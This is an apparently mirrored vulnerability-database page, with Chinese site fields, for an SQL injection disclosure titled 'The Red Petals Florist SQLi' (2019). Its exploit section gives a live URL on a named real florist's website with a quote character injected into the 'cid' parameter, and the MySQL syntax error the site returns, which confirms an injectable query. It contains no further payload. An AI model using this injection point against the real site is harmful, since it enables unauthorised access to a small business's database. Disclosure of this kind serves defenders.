The Red Petals Florist SQLi - CXSecurity.com

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1736112 漏洞类型
发布时间 2019-09-11 更新时间 2019-09-11
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2019090089
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
# Exploit Title:The Red Petals Florist SQLi
# Date:  10 Sep 2019                                             
# Author: H.BBF3.4 & A.BBF3.4         

The Red Petals Florist is A member of Association of Bridal Consultants Singapore              
                                    
+++++++++++++++++++++++++

demo= http://www.theredpetals.com/subcat1.php?cid=13%27

(You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''13'' order by photo_title' at line 1)